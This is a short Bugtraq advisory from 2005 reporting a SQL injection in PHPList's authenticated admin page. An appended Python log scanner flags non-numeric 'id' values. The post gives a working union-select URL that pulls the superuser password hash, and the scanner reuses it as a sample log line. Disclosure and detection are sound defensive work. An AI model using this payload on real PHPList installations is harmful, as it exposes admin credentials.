List: bugtraq
Subject: PHPList Vulnerability
From: ziot () whataboutpp ! com
Date: 2005-07-31 23:02:38
Message-ID: 20050731230238.22060.qmail () securityfocus ! com
http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password
Although not completely open, because one must authenticate, this completely leaves the database open, thus being a SQL injection hole.
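
Added example, not part of the original post: a defender-side check that scans web server access logs for requests whose id parameter is not a plain integer, as in the URL above. It assumes that id is meant to be numeric and that the server writes common/combined-format logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords and comment markers that have no place in a numeric identifier.
SQL_HINT_RE = re.compile(r"\b(union|select|from|where)\b|/\*|--", re.I)

def check_line(line, param="id"):
    """Return (value, reason) if `param` is not a plain integer, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes, so %20union%20select becomes " union select".
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if not (value.isascii() and value.isdigit()):
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
            return value, reason
    return None

def scan(lines, param="id"):
    """Return a list of (line_number, value, reason) for suspicious requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_line(line, param)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - admin [31/Jul/2005:22:58:01 +0000] '
    '"GET /lists/admin/?page=members&id=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - admin [31/Jul/2005:22:59:14 +0000] '
    '"GET /lists/admin/?page=members&id=1%20union%20select%20null,password,'
    'null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password '
    'HTTP/1.1" 200 5344',
    '192.0.2.11 - admin [31/Jul/2005:23:00:40 +0000] '
    '"GET /lists/admin/?page=members&id=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for n, value, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: id={value!r}")
```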